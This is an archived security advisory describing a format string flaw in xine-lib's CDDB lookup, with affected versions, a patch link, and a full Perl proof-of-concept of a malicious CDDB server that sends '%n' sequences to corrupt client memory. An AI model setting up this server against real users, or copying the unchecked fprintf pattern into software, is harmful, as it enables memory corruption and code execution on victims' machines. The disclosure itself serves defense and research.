Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	xine based CD Player Format String 10 Oct. 2005    Summary "xine is a free multimedia player. It plays back CDs, DVDs, and VCDs. It also decodes multimedia files like AVI, MOV, WMV, and MP3 from local disk drives, and displays multimedia streamed over the Internet. It interprets many of the most common multimedia formats available - and some of the most uncommon formats, too." By setting up a malicious CDDB server, an attacker can overwrite arbitrary memory locations with arbitrary data using Xine based CD Players.   Credit: The information has been provided by Ulf Harnhammar. The vendor Advisory can be found at: http://xinehq.de/index.php/security/XSA-2005-1 Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * Xine versions 1-beta releases starting with and including 1-beta3  * Xine versions 1-rc releases  * Xine versions 1.0 releases up to and including 1.0.2  * Xine version 1.1.0 release Immune Systems:  * Xine 0.9 and prior  * Xine versions 1-alpha releases  * Xine versions 1-beta releases prior to 1-beta3  * Xine versions 1.0 releases starting with and including 1.0.3  * Xine version 1.1.1 When playing an Audio CD, using xine-lib based media application, the library contacts a CDDB server to retrieve metadata like the title and artist's name. During processing of this data, a response from the server, which is located in memory on the stack, is passed to the fprintf() function as a format string. An attacker can set up a malicious CDDB server and trick the client into using this server instead of the pre-configured one. Alternatively, any user and therefore the attacker can modify entries in the official CDDB server. Using this format string vulnerability, attacker-chosen data can be written to an attacker-chosen memory location. This allows the attacker to alter the control flow and to execute malicious code with the permissions of the user running the application. Although it requires the user to play an Audio CD, this vulnerability can still be exploited remotely, because a xine Audio CD MRL (media resource locator) could be embedded into a website. Vendor Status: The vendor as issued a patch that can be found at: http://cvs.sourceforge.net/viewcvs.py/xine/xine-lib/src/input/input_cdda.c?r1=1.77&r2=1.78. CVE Information: CAN-2005-2967 Proof of Concept: #!/usr/bin/perl -- # xine-cddb-server # by Ulf Harnhammar in 2005 # I hereby place this program in the public domain. use strict; use IO::Socket; $main::port = 8880; $main::timeout = 5; # *** SUBROUTINES *** sub mysend($$) {   my $file = shift;   my $str = shift;   print $file "$str\n";   print "SENT: $str\n"; } # sub mysend sub myreceive($) {   my $file = shift;   my $inp;   eval   {     local $SIG{ALRM} = sub { die "alarm\n" };     alarm $main::timeout;     $inp = <$file>;     alarm 0;   };   if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; }   $inp =~ tr/\015\012\000//d;   print "RECEIVED: $inp\n";   $inp; } # sub myreceive # *** MAIN PROGRAM *** {   my $server = IO::Socket::INET->new( Proto => 'tcp',                                       LocalPort => $main::port,                                       Listen => SOMAXCONN,                                       Reuse => 1);   die "can't set up server!\n" unless $server;   while (my $client = $server->accept())   {     $client->autoflush(1);     print 'connection from '.$client->peerhost."\n";     mysend($client, '201 metaur CDDBP server v1.5PL2 ready at '.            scalar localtime);     while (my $str = myreceive($client))     {       if ($str =~ m/^cddb hello ([^ ]+) ([^ ]+) (.+)$/i)       {         mysend($client, "200 Hello and welcome $1\@$2 running $3.");         next;       }       if ($str =~ m/^proto (\d+)$/i)       {         mysend($client, "201 OK, CDDB protocol level now: $1");         next;       }       if ($str =~ m/^cddb query ([0-9a-f]+)/i)       {         mysend($client, "200 rock $1 Exploiters / Formatted and Stringed");         next;       }       if ($str =~ m/^cddb read ([a-z]+) ([0-9a-f]+)/i)       {         my $docum = <<HERE; 210 $1 $2 CD database entry follows (until terminating \`.') # %n%n%n%n DISCID=$2 DTITLE=Exploiters / Formatted and Stringed DYEAR=2005 DGENRE=Rock TTITLE0=Format TTITLE1=String TTITLE2=Bug EXTD= YEAR: 2005 EXTT0= EXTT1= EXTT2= PLAYORDER= . HERE         $docum =~ s|\s+$||s;         mysend($client, $docum);         next;       }       if ($str =~ m/^quit$/i)       {         mysend($client, '230 metaur Closing connection. Goodbye.');         last;       }       mysend($client, '500 Unrecognized command.');     } # while str=myreceive(client)     close $client;     print "closed\n\n\n";   } # while client=server->accept() } #EoF  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability Insight Control for Linux Multiple Vulnerabilities HP-UX Running NFS/ONCplus Denial of Service Vulnerability HP-UX Running BIND Denial of Service Vulnerability 2011 HP-UX Running XNTP Denial of Service Vulnerability HP-UX Denial of Service Vulnerability Webkit Detached Body Element Code Execution Vulnerability Mac OS X Compact Font Format Decoder Code Execution Vulnerability WebKit WBR Tag Removal Code Execution Vulnerability Webkit Undefined DOM Prototype Attach Code Execution Vulnerability Apple HFS Information Disclosure Vulnerability XPDF arbitrary Arbitrary Code Execution Vulnerabilities Hewlett-Packard Data Protector Client EXEC_CMD omni_chk_ds.sh Code Execution Vulnerability Red Hat OpenJDK IcedTea6 ClassLoader Code Execution Vulnerability HP-UX Apache Running Tomcat Servlet Engine Remote Modification and Denial of Service Vulnerabilities  Featured Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability Cisco Unified Service Monitor brstart add_dm Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®